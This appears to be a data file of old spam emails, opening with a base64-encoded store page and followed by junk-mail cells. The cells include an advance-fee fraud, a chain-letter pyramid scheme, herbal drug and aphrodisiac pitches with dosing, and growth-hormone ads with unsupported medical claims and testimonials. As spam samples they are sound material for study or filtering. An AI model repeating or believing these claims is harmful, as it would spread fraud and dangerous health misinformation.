YW49MT4NDQo8IS0tIDMgUFJPRFVDVFMgU0lERSBCWSBTSURFIC0tPg0NCjx0
YWJsZSBib3JkZXI9IjAiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIg
Y2VsbHBhZGRpbmc9IjIiPg0NCiA8dHI+ICAgPHRkIHdpZHRoPSIxMDAlIiBj
b2xzcGFuPTM+PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvbW9k
aGRyXzZ1bml0X2RvbnRtaXNzLmdpZiIgd2lkdGg9NDM1IGhlaWdodD0yNj48
L3RkPiA8L3RyPiANDQoNDQoNDQo8dHI+DQ0KICA8dGQgd2lkdGg9IjMzJSIg
YWxpZ249ImNlbnRlciIgdmFsaWduPSJ0b3AiPjxhIGhyZWY9Imh0dHA6Ly93
d3cudnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2Jl
bG93d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRtbD9tb2RlPWl0ZW1wYWdlJmZp
bGU9L3BhZ2UvaXRlbXBhZ2V2NC9pdGVtcGFnZS5zcGwmcHJvZElEPTI4ODk4
NCI+DQ0KIDxpbWcgc3JjPSIvYWx0X2ltYWdlcy8yMDAwLzI4ODk4NF83NV83
NS5qcGciIHdpZHRoPSI3NSIgaGVpZ2h0PSI3NSIgYm9yZGVyPSIwIj48L0E+
IDxicj4NDQogIDxmb250IGZhY2U9IkFyaWFsIiBzaXplPSIyIiBjb2xvcj0i
MDAwMDAwIj4NDQo8Yj4gQmxhY2sgRGlhbW9uZCBTa2lpbmc8L2I+PEJSPlRh
Y2tsZSBzdGVlcCBkcm9wcyBhbmQgdG93ZXJpbmcgbW9ndWxzITxicj4gPGZv
bnQgY29sb3I9cmVkPlNhdmUgMTUlPC9mb250Pjxicj4gIDxmb250IHNpemU9
IjEiIGZhY2U9ImFyaWFsIj4gIE9ubHk6IDxhIGhyZWY9Imh0dHA6Ly93d3cu
dnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93
d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9
L3BhZ2UvaXRlbXBhZ2V2NC9pdGVtcGFnZS5zcGwmcHJvZElEPTI4ODk4NCI+
PGZvbnQgc2l6ZT0yIGZhY2U9YXJpYWw+PGI+ICQxNi45OTwvYj48L2ZvbnQ+
PC9BPg0NCiAgPC9mb250PjwvdGQ+DQ0KICANDQogIDx0ZCB3aWR0aD0iMzMl
IiBhbGlnbj0iY2VudGVyIiB2YWxpZ249InRvcCI+PGEgaHJlZj0iaHR0cDov
L3d3dy52c3RvcmUuY29tL2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMv
YmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2Um
ZmlsZT0vcGFnZS9pdGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9OTUy
NzAiPg0NCiA8aW1nIHNyYz0iL2FsdF9pbWFnZXMvMjAwMC85NTI3MF83NV83
NS5qcGciIHdpZHRoPSI3NSIgaGVpZ2h0PSI3NSIgYm9yZGVyPSIwIj48L0E+
IDxicj4NDQogIDxmb250IGZhY2U9IkFyaWFsIiBzaXplPSIyIiBjb2xvcj0i
MDAwMDAwIj4NDQo8Yj5Dcm9zcyBDb3VudHJ5IFNraWluZzwvYj48QlI+SmVm
ZiBOb3J3YWxrIGRlbW9uc3RyYXRlcyB0aGUgZnVuZGFtZW50YWxzLiA8YnI+
IDxmb250IGNvbG9yPXJlZD5TYXZlIDE1JTwvZm9udD48YnI+ICAgPGZvbnQg
c2l6ZT0iMSIgZmFjZT0iYXJpYWwiPiAgT25seTogPGEgaHJlZj0iaHR0cDov
L3d3dy52c3RvcmUuY29tL2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMv
YmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2Um
ZmlsZT0vcGFnZS9pdGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9OTUy
NzAiPjxmb250IHNpemU9MiBmYWNlPWFyaWFsPjxiPiAkMTYuOTk8L2I+PC9m
b250PjwvQT4NDQogIDwvZm9udD48L3RkPg0NCiAgPHRkIHdpZHRoPSIzNCUi
IGFsaWduPSJjZW50ZXIiIHZhbGlnbj0idG9wIj48YSBocmVmPSJodHRwOi8v
d3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9i
ZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1pdGVtcGFnZSZm
aWxlPS9wYWdlL2l0ZW1wYWdldjQvaXRlbXBhZ2Uuc3BsJnByb2RJRD0zNDQ0
MTgiPg0NCiA8aW1nIHNyYz0iL2FsdF9pbWFnZXMvMjAwMC8zNDQ0MThfNzVf
NzUuanBnIiB3aWR0aD0iNzUiIGhlaWdodD0iNzUiIGJvcmRlcj0iMCI+PC9h
PiA8YnI+DQ0KICA8Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiIgY29sb3I9
IjAwMDAwMCI+DQ0KPGI+Qm9hcmR3b3JsZDwvYj48QlI+QW4gZXhjbHVzaXZl
IGNvbGxlY3Rpb24gb2YgdGhlIHRvdWdoZXN0IHJ1bnMhPGJyPiAgPGZvbnQg
Y29sb3I9cmVkPlNhdmUgMTUlPC9mb250Pjxicj4gICAgPGZvbnQgc2l6ZT0i
MSIgZmFjZT0iYXJpYWwiPiAgT25seTogPGEgaHJlZj0iaHR0cDovL3d3dy52
c3RvcmUuY29tL2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3
aG9sZXNhbGVzcG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2UmZmlsZT0v
cGFnZS9pdGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9MzQ0NDE4Ij48
Zm9udCBzaXplPTIgZmFjZT1hcmlhbD48Yj4gJDE2Ljk5PC9iPjwvZm9udD48
L0E+DQ0KICA8L2ZvbnQ+PC90ZD4NDQo8L1RSPg0NCjwvVEFCTEU+DQ0KPCEt
LSBlbmQgMyBQUk9EVUNUUyBTSURFIEJZIFNJREUgLS0+DQ0KPC90ZD4NDQo8
L3RyPg0NCg0NCjwhLS0gZSBjYXRsYXlvdXQgLS0+DQ0KDQ0KPC9UQUJMRT4N
DQo8L3RkPg0NCjwhLS0gL2hvbWUgLS0+DQ0KDQ0KCSAgPC90cj4NDQoJICA8
L3RhYmxlPjxCUj4NDQogICAgPGRpdiBhbGlnbj1jZW50ZXI+PHRhYmxlIGNl
bGxwYWRkaW5nPSIwIiBjZWxsc3BhY2luZz0iMCIgYm9yZGVyPSIwIiBXSURU
SD0iMTAwJSI+DQ0KPHRyPg0NCiAgPHRkIHZhbGlnbj0idG9wIiBhbGlnbj0i
Y2VudGVyIj48Zm9udCBmYWNlPSJBcmlhbCIgY29sb3I9IiMwMDAwMDAiIHNp
emU9IjEiPg0NCiAgPGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUuY29tL2Nn
aS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9y
dHMvcGFnZS5odG1sP21vZGU9aG9tZSZmaWxlPS9wYWdlL2hvbWUvaG9tZS5z
cGwiPkhvbWU8L2E+IHwgDQ0KICA8YSBocmVmPSJodHRwOi8vd3d3LnZzdG9y
ZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xl
c2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1hYm91dCZmaWxlPS9wYWdlL2Fi
b3V0L2Fib3V0LnNwbCI+QWJvdXQgVXM8L2E+IHwgDQ0KICA8YSBocmVmPSJo
dHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNw
b3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1jdXN0
c2VydiZmaWxlPS9jdXN0b21lcnNlcnZpY2UvY3VzdF9zZXJ2LnNwbCI+Q3Vz
dG9tZXIgU2VydmljZTwvYT4gfCANDQogIDwhLS08YSBocmVmPSJodHRwOi8v
d3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9i
ZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1ob21lJmZpbGU9
bm90dGhlcmUuc3BsJnBhZ2U9Zmlyc3QmbmJzcDt0aW1lJm5ic3A7c2hvcHBl
cnMiPkZpcnN0IFRpbWUgU2hvcHBlcnM8L2E+IHwgLS0+DQ0KICA8YSBocmVm
PSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9y
ZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1z
ZWFyY2gmZmlsZT0vcGFnZS9zZWFyY2gvc2VhcmNoMi5zcGwiPlNlYXJjaDw</t>
  </si>
  <si>
    <t xml:space="preserve">
You Have Won The First Round!
Claim Your Entry Now!
Collect The Prize Of The Week!
Click Here To Collect!
Â 
We apologize for any email you may have
inadvertently received.
Please CLICK HERE to be removed from
future mailings.
</t>
  </si>
  <si>
    <t xml:space="preserve">Lowest Life Insurance Quotes
td {font-family: arial}The Lowest Life Insurance Quotes 
Without the Hassle! 
Compare rates from the
nation's top insurance companies 
Shop,
Compare and Save 
Fill out the simple form,
and you'll have the 
15 best custom quotes in 1 minute.COMPARE YOUR CURRENT COVERAGE 
to these sample 10-year level term monthly
premiums 
(20 year, 30 year and smoker rates also available) 
$250,000
$500,000
$1,000,000
Age
Male
Female
Male
Female
Male
Female
30
$12
$11
$19
$15
$31
$27
40
$15
$13
$26
$21
$38
$37
50
$32
$24
$59
$43
$107
$78
60
$75
$46
$134
$87
$259
$161Click Here to Compare! 
It's fast, easy and FREE! 
*All quotes shown are from insurance companies rated A-, A, A+ or A++ by
A.M. Best Company (a registered rating service) and include all fees and commissions. 
Actual premiums and coverage availability will vary depending upon age, sex, state
availability, health history and recent tobacco usage. To Unsubscribe, Reply with Unsubscribe in Subject!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 kjhkjh    hghg   jhgjhjgvjh
We sent our photographer into the biker parties. He got pictures of the bikes &amp; lifestyle butmostly he got pictures of the biker girls. Some sexy &amp; a lot nude.We burned these pictures to a disk and now they available on disk for you to view on your own computer. The parties are wild and so are the pictures. Over 190 pictures on the disk and the 29.99 price also includes express shipping !!!! These pictures are uncensored so do not request any more information if you are not at least 18.For a order type "order form" in the subject and  reply to:BikeDisk@excite.com
To be removed from our mailing type "nobikers" in the subject and reply to :NoBikesToday@excite.com
 kjhkjh    hghg   jhgjhjgvjh
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Friend:Find solutions to all your daily problems and life's challenges at the click of a mouse button?We have the answers you're looking for on The Word Bible CD-ROM it is one of the most powerful, life-changing tools available today and it's easy to use.On one CD, (Windows or Macintosh versions) you have a complete library of Bibles, well known reference books and study tools. You can view several Bible versions simultaneously, make personal notes, print scriptures and search by word, phrase or topic.The Word Bible CD offers are simply amazing.The wide range of resources on the CD are valued at over $1,500 if purchased separately.**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IndexAlso:** Build a strong foundation for dynamic Bible Study,
** Make personal notes directly into your computer,
** Create links to favorite scriptures and books.
Try it. No Risk. 30-day money-back guarantee
[excluding shipping &amp; handling]If you are interested in complete information on The Word CD, please visit our
Web site: http://bible.onchina.net/ US and International orders accepted. Credit cards and personal checks accepted.If your browser won't load the Web site please click the link below to send us an e-mail and we will provide you more information.mailto:bible-cd@minister.com?subject=Please-email-Bible-info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face.May God Bless You,
GGII Ministries, 160 White Pines Dr., Alpharetta Ga, 30004
E-mail address:Bible-CD@minister.com 
Phone:  770-343-9724******************************************We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mailto:rm6920@post.com?subject=offlist    </t>
  </si>
  <si>
    <t xml:space="preserve">
Something EVERY business needs, a Merchant Account!A Merchant Account is the hardware and software which
gives you the ability to allow customers to pay using
any credit card such as Visa, Master Card, American
Express, Discover etc., and other forms of payment such
as e-Checks, Debit Cards and secure Internet based
payment.We offer several different packages, any of which can
be custom tailored to your needs. Services are currently
provided to the United States and Canada.To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needs.Thank you***
To be removed from our mailing list, reply to this
email with the word 'Remove' in the subject line.
***
</t>
  </si>
  <si>
    <t xml:space="preserve">MRS. REGINA ROSSMAN.
#263 SANDTON CITY
JOHANNESBURG,SOUTH AFRICA.
E-MAIL: joel_rose1@mail.com
ATTN:ALHAJIWith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(G.D.M.C.) of Sierra Leone. My husband was one of the
people targeted by the rebel forces. On the course of
the revolution in the country, prominent people were
hijacked from their homes to an unknown destination.Two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ï¿½(ECOMOG)ï¿½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title.The cash involved inside the box was US$30 Million
(Thirty Million United States Dollars). Due to fear
and limited rights as a refugee, I deposited the items
with a private security company in order not to raise
an eyebrow over the box here in South Africa in my
sonï¿½s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30% for your kind assistance.
Also, we have decided to set aside 5% of the total sum
for expenses that might be incurred by the parties in
the course of the transfer both locally and
externally. For the interest of this business, do not
hesitate to contact my son Mr. JOEL R. ROSSMAN on the
above e-mail address immediately you
receive this message for more information and to
enable
us proceed towards concluding all our arrangements. No
other person knows about this money apart from my son
and I. We await your most urgent response.please we
need your fax/phone numbers for esiear communication.Thanking you for your co-operation and God bless you.
Best regard,MRS. REGINA ROSSMAN.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
NEW CD ROM is helping to Create HUGE FORTUNES!!Free Info:* What if you could make a full time income handing/sending 
  out a $1.25 CD ROM?* What if the company paid you EVERY DAY?* What if it was a New York Stock Exchange Company?* What if there was no "real" competition, and everybody 
  needs our service?* What if you got paid when somebody goes to your website 
  and views the hottest video presentation ever and signs up?
If you are the least bit curious about why this CD ROM 
is making us Fortunes!!All you need to do is simply:1.Send an email to: mailto:tim33u2@n2mail.com?subject=CD_ROM2. Put " CD ROM " in the subject headingWe will email you all you need to know to get signed up 
and making money TODAY!!!Waiting to hear from you soon!
GAPS.. Please put "Remove" in subject line to get out
of this list.  Thanks.     </t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Friends &amp; Future Millionaire: AS SEEN ON NATIONAL TV: 
Making over half million dollars every 4 to 5 months from your home for 
an investment of only $25 U.S. Dollars expense one time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vie e-mail, each of the 5 reports from 
these 5 different individuals. Save them on your computer so they will be 
accessible for you to send to the 1,000's of people who will order them 
from you. Also make a floppy of these reports and keep it on your desk in 
case something happen to your computer. IMPORTANT - DO NOT alter the names of the people who are listed next 
to each report, or their sequence on the list, in any way other than what is 
instructed below in step '' 1 through 6 '' or you will loose out on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 
Those 100 people mail out 5,000 e-mails each for a total of 500,000 e-mails. 
The 0.2% response to that is 1000 orders for Report # 3. Those 1000 people send out 5,000 e-mails each for a total of 5 million e-mails 
sent out. The 0.2% response to that is 10,000 orders for Report # 4.
Those 10,000 people send out 5,000 e-mails each for a total of 50,000,000 
(50 million) e-mails. The 0.2% response to that is 100,000 orders for Report 
# 5
 THAT'S 100,000 ORDERS TIMES $5 EACH=$500,000.00 (half million).
Your total income in this example is: 1..... $50 + 2..... $500 + 3..... $5,000 + 4 
... $50,000 + 5..... $500,000 ........ Grand Total=$555,550.00 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGUREOUT 
THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU 
CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY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Advertising on the net is very very inexpensive and there are hundreds 
of FREE places to advertise. Placing a lot of free ads on the Internet will 
easily get a larger response. We strongly suggest you start with Method # 1 
and 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receivethe report. ===========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#1 from:  A. Christ
1208 Allendale Rd.
Mechanicsburg, PA 17055___________________________________________________________ 
REPORT # 2: "The Insider's Guide to Sending Bulk e-mail on the Net" 
Order Report # 2 from:     Michael P. 
    2508 Robin 
    Altus, OK  73521 
    USA 
____________________________________________________________ 
REPORT # 3: "Secret to Multilevel Marketing on the Net" 
Order Report # 3 from : D. J.
16 Northcrest Dr.
London, ONTARIO, CANADA
N5X 3V8
__________________________________________________________ 
REPORT # 4: "How to Become a Millionaire Utilizing MLM &amp; the Net" 
Order Report # 4 from:E. Zurbrigg
RR #1
St. Marys, ON, Canada
N4X 1C4
____________________________________________________________ 
REPORT #5: "How to Send Out 0ne Million e-mails for Free" 
Order Report # 5 from: A. Ebert
R. R. #4
Thamesford, Ontario, Canada
N0M 2M0____________________________________________________________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Jodyaboutreceiving ''junk 
mail''. I made fun of the whole thing,spoutingmy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$20,560.00 and by the end of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(Note: To avoid delays make sure appropriate postage to Canada is applied if mailing from the US)To be removed: moretips2000@yahoo.com   Subject: Remove</t>
  </si>
  <si>
    <t xml:space="preserve">
Greetings &amp; Blessings To You!Offering for your "Sensitive" Delight: 1. "Seventh Heaven" Kathmandu Temple Kiff (tm); a viripotent cannabis alternative for blissful regressions of vexatious depressions... 2.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.3. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living... 4. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...*********************************************
Kathmandu Temple Kiff is a proprietary; Nepalese, sensitive, pipe-smoking/stoking substance. Kathmandu Temple Kiff is indeed the most substantial marijuana/cannabis alternative on the planet.Absolutely Legal!  Marvelously Potent!Kathmandu Temple Kiff possesses all of the positive virtues fine ganja/cannabis without any of the negatives.  An amalgamation of high concentrates of rare euphoric herbas, Kathmandu is offered in a solid jigget/bar format and is actually more UPLIFTING &amp; POISED than cannabis / marijuana while rendering Euphoria, Happiness, Mood-Enhancement, Stress/Depression Relief and promoting contemplativeness, creativity, better sleep, lucid dreaming ... and enhancing the sexual experience!!!Kathmandu Temple Kiff is simply the best and just a little pinch/snippet of the Kathmandu goes a long, "sensitive" way.  Just 4 or 5 draws of the pipe ... (an herb pipe included with each package of Kathmandu Temple Kiff).PLEASE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21 years of age.Ingredients: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flower-tops and oils in extreme ratio extractment ranging from 8.5 to 1. to 60 to 1, viripotent concentrations : Drachasha, Chavana Prash, Trikatu, Black Seed Herb, Capillaris Herba, Angelica Root, Wild Dagga, Haritaki, Shatavari, Labdunum, Neroli, Unicorn Root, Papaver Rhoes, Dendrobian, Calea Zacalechichi, Rue, Amla, Salvia Divinorum, Crocus Sativa, Lotus and Gokshura.*********************************************SWEET VJESTIKA APHRODISIA DROPS (tm) TANTRA PLEASURE SACRAMENTIndeed; a HeavenSent Treasure of Pleasure!!  To entice your Passion, 
To intrigue your Desire,
Enchantment's Rapture;
Sweet Vjestika Fire....SWEET VJESTIKA APHRODISIA DROPS EXTRAVAGANTLY INSPIRES AND ENHANCES:*Penile &amp; clitoral sensitivity
*Sensitivity to touch
*Desire to touch
*Desire to be touched
*Fantasy
*Lust
*Rapture
*Erogenous sensitivity
*Uninhibitedness
*Sexual courageousness
*Sexual gentleness and ferocitySWEET VJESTIKA APHRODISIA DROPS(tm)*Prolongs and intensifies foreplay;
*Prolongs and intensifies orgasm / climax;
*Inspires body, mind, spirit orgasm / climax;
*Inspires and enhances body, mind, spirit communion betwixt lovers;
*Inspires and enhances the enchantment / glamourie of Love....Sweet Vjestika is a Chimera Tantric proprietary glamourie / enchantment Fantasia Amalgamation for men and women, comprised of high ratio extracts derived from the following Herbs of Power which are master blended to emphasis extravaganza body, mind, spirit erogenous sensory awareness and gourmet carnal delight.  CONTENTS:Whole MaHuang, Bee Pollen, Epimedium Angelica, Rehmannia, Ginger, Schizandra, Polygonatum, Adenophora, Tremella, Tang Kuei, Reishi, Codonopsis, Eucommium, Lycii Berry, Ligusticum, Peony Root, Fo Ti, Atractylodes, Ophiopogon, Royal Jelly, Euryales Seeds, Poria, Licorice, Mountain Peony Bark, Cormi Fruit, Rose Hips, Prince Ginseng, Scrophularia, Alisma, Astragalus, Fennel, Buplerium, Cypera, Aconite, Polygala, Red Sage Root, Jujube Seed, Lotus Seed, Tien Chi Ginseng, Ligus Ticum, Psoralea, Dodder Seed, and Cisthanches in a solution containing 24% pure grain alcohol as a preservative, distilled water and Lecithen as an emulsifier. SUGGESTED USAGE:Sweet Vjestika is extremely potent.  Use 10 ï¿½ 15 drops sublingually or in juice or tea, not to exceed 25 drops.  Best when taken upon an empty stomach approx. 45 minutes before intimacy.  Based upon 25 ï¿½ drop increments there are approx. 60 dosages per 1 oz. bottle.  Usage should not exceed 2 doses per week.  Persons taking any precsription medication or suffering from depression or anxiety, should consult with their health care provider before using.  This product is not intented for usage by persons with abnormal blood pressure or any cardiovascular malady or any thyroid dysfunction.  Nor is it to be used during pregnancy or by any person under 21 years of age.  *********************************************
Also for your sensitive mellowness.... "Seventh Heaven" Prosaka Tablets are an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etc.NO side effects!  NO dependency!  Vivaciously Mellow!There is ABSOLUTELY nothing else quite like "Seventh Heaven" Prosaka (tm).Ingredients:Seventh Heaven Prosaka tablets contain the following herbal factors in precise prescription: Tadix Salviae, Sensitive Mimosa Bark, Arullus Euphoriae, Shizandra, Frutcus Mori, Caulis, Polygoni Multiflori, Zizphus, Tang Kuei, Cedar Seed, Sweetflag Rhizome, Cuscutae, Amber, Radix Scutellariae, Evodia, Longan, Arizisaema, Cistanches, Radix Polygalae, Red Sage Root and Eucommia.  Recommended dosage: 1-2 tablets; 2-3 times per day.**********************************************
Also.... for your "Sensitive" "Pure Energy" Energization.... "Seventh Heaven" Gentle Ferocity Tablets (tm).  A "Seventh Heaven"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Enjoy!Attention!  Attention!!For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you!!Entirely Natural! Increases Energy! Increases Metabolism! Decreases Appetite!Contents:Each Gentle Ferocity Tablet contains 500 mg. of the following proprietary formulated, high-ratio concentrated botanical factors ... Cortex Eucommiae, Radex Polygoni Multiflori, Zizyphus Seed, Fructus Schisandrae, Radix Panax Ginseng, Radix Astragali, Atractylode, Sclerotium, Porial Cocos, Saussurea Tang Kuei, Longan, Radix Paeoniae, Biota Seeds, Glehnia, Radix Salviae, Ligusticum, Lycu Berry, Radix Dioscoreae, Cortex Mouton, Frutcus Corni, Radix Polygalae, Cistanches, Radix Pseudoslellariae and Cortex Aranthopanacis.  Recommended dosage: One to two
tablets as needed.========================================
PRICING INFORMATION:1.      SEVENTH HEAVEN KATHMANDU TEMPLE KIFF (tm)One     .75 oz. jigget/bar          $65.00
One    2.0 oz. jigget/bar          $115.00 (Free Capillaris Herba with 2.0 oz. bar. Refer to Capillaris paragraph at end of text)2.     SWEET VJESTIKA APHRODISIA DROPS (tm)One	1.0 oz. bottle		$90.00   
Two	1.0 oz. bottles	       $140.00  3.     SEVENTH HEAVEN PROSAKA (tm)One    100 tablet tin          $40.00
Three  100 tablet tins        $105.00
Six    100 tablet tins        $185.004.     SEVENTH HEAVEN GENTLE FEROCITY (tm)One   300 tablet jar          $130.005.     SWEET APHRODISIA INTRO COMBINATION OFFERIncludes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; one, 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.  For $150.00 (Reg. $205.00  Save $55)  (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)6.     BODY, MIND, SPIRIT "HEAVENLY" INTRO COMBINATION OFFERIncludes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka.  For $125.00 (Reg. $155.00  Save $30) (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)7.     "PURE ENERGY" INTRO COMBINATION OFFER Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity.  For $170.00 (Reg. $245.00  Save $75)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text)8.     "SENSITIVE" PREFERENTIAL INTRO COMBINATION OFFERIncludes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity For $200.00 (Reg. $285.00  Save $85)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)9.     ULTIMATE HERBACEOUSNESS INTRO COMBINATION OFFERIncludes one - 2.0 oz. jigget / bar of Kathmandu Temple Kiff, one - 1 oz. bottle of Sweet Vjestika Aphrodisia Drops, one - 100 tablet tin of Prosaka, and one - 300 count jar of Gentle Ferocity for a deep discounted Retail Price of $260.00 (Reg. $375.00  Save $115)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)SPECIAL OFFER:  For a limited time only, you will receive a FREE personal brass hookah with the Ultimate Herbaceous Intro Offer as our gift to you.  This hookah has a retail value of $25.00. **************************************************
ORDERING INFORMATION:For your convenience, you can call us direct with your orders or questions.Call 1-623-972-5999Mon. ï¿½ Fri. 10:30 am to 7:00 pm (MT) 
Sat. - 11:00 am to 3:00 pm (MT)For all domestic orders, add $5.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.LIVE sales associates are awaiting your call.  Be sure to ask about our brand new offering, Equivalence Tablets and Dragon Wing Remedy Spray.  These "Dynamic Duo" products are without peer for managing pain due to problems such as chronic pain, Fibromyalgia and Arthritis!
**************************************************
SPECIAL DISCOUNT &amp; GIFTCall now and receive a FREE botanical gift!  With every order for a 2.0 oz. jigget / bar of Kathmandu Temple Kiff or one of our four (4) Intro Combination Offers, we will include as our free gift to you ... a 2.0 oz. package of our ever so sedate, sensitive Asian import, loose-leaf Capillaris Herba for "happy" smoking or brewing ... (a $65.00 retail value).====================================================
To be removed from this mailing list, send an email with REMOVE in the subject line to: gordon795@runbox.com
</t>
  </si>
  <si>
    <t>We are Loan Specialists.....Tap into our huge network of Lenders!For U.S.A. Homeowners OnlyInterest Rates have Dropped....Start Saving Now!We Will Shop The Best Loan For You!Are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of.CLICK HERE FOR ALL DETAILS http://usuarios.tripod.es/loan26/mort15.html===================================================================
REMOVAL INSTRUCTIONS: You may automatically remove yourself from any future mailings
by clicking here. mailto:geoposti@uole.com?subject=delete-mort</t>
  </si>
  <si>
    <t xml:space="preserve">
 Would you like to
  look and feel 10-20 years younger
 ? Would you be interested in
  increasing energy levels
  by
  84%
 ?  15x 
 How about  Increasing Sexual Potency Frequency
  by 
 75%
 ?  Would you like to  increase your Muscle Strength 
 by 
 88%
 While...At the same time...  Reducing Body Fat
  by 
 72%
  and 
 Wrinkles
  by 
 51%?
 Of course you would! We offer the Most Potent Oral GH Formula available to help you achieve all of this and more! Turn Back The Clock and Turn Up the Energy Now! 
In thousands of clinical studies, GH has been shown to accomplish the following: 
 _ Reduce body fat and build lean muscle without exercise!
  _ Enhance sexual performance
  _ Remove wrinkles and cellulite
  _ Lower blood pressure and improve cholesterol profile
  _ Improve sleep, vision and memory
  _ Restore hair color and growth
  _ Strengthen the immune system
  _ Increase energy and cardiac output
  _ Turn back your body's biological time clock 10-20 years in 6 months of usage !!!
 Here is a sample of just a few of the letters we receive every week 
thanking us for what our product has done:  "I am astounded! The day before I started taking the GH1, 
I took blood tests. Then I began using the GH1 as directed. 
After 8 weeks I took blood tests again. 
My IGF-1 level (evidence of GH) showed a 70% increase! 
Furthermore, my cholesterol score went from 190 down to 144! 
I definitely feel better overall and certainly have more energy. 
To say the least I am very impressed and pleased with GH1. 
My "biological" age is now that of a 40 year old!" 
-Dr. A. Zuckerman M.D., age 60, NY "A year ago, my blood pressure was 180/120 and I was on blood 
pressure medication. I also started the Anti-Aging formula, GH1. 
After a year on the product, my blood pressure is now 120/80-- 
and I haven't been on the blood pressure medication for months!" 
-Susanne Peters, Laguna Beach, CA "After 2 weeks on Anti-Aging Formula GH1, I noticed a higher 
level of energy, increased sexual energy and my memory and vision 
were enhanced. My blood pressure is down to 126/84 after workout-and 
it seems every other day I have to 'rev-up' the amps on the treadmill 
at the gym. I've noticed a tightening of the skin under my chin and 
a change in my lungs with much easier breathing. After 4 months, 
I only need 5 hours sleep instead of 7. One morning, I had to do an extra 
karate workout just to expend all the extra energy!" "After 6 months on 
GH1, my blood sugar levels went from 130 down to 65! Also, my stamina has 
increased, as well as my energy and sex drive--this product is GREAT!" 
-Dr. Richard Boyd, 78 years old, Harvard Clinical Psychologist, CA "As a straight-ahead bicycle racer, I used to have to wait a minute 
and a half after sprinting, for my heart rate to come down to where 
I could sprint again. After a month on GH1, I can now sprint again 
after only 45 seconds! GH1 cut my waiting time in half!" 
-Ed Caz, age 40, Fresno,CA "When I heard GH1 would reduce body fat increase lean muscle WITHOUT EXERCISE, I couldn't believe it--but in just a few months I lost 4 inches around my waist without exercising and my body fat went from 22 down to 19--even though I gained 10 pounds! Also, after 4 months, my fine vision returned. I no longer need the magnifying glasses to read fine print." 
-Larry Baker, age 54,Oceanside, CA "I have been taking Anti-Aging Formula GH1 for five months now. 
I have been under great stress in my business. 
I believe that taking Anti-Aging Formula GH1 has had a big part in keeping 
my energy level up and having the strength to stay positive in the midst 
of discouraging circumstances. Last week I came down with a cold. 
Colds are tough on me and seem to run their course- headaches, sinus inflammation, and then throat. I am progressing through those stages but more quickly than before. Hallelujah! My eyes aren't as puffy and the skin on my hands snaps back faster. 
My muscles seem to have better tone-I notice it in my legs-and I have more energy 
when I go out walking." 
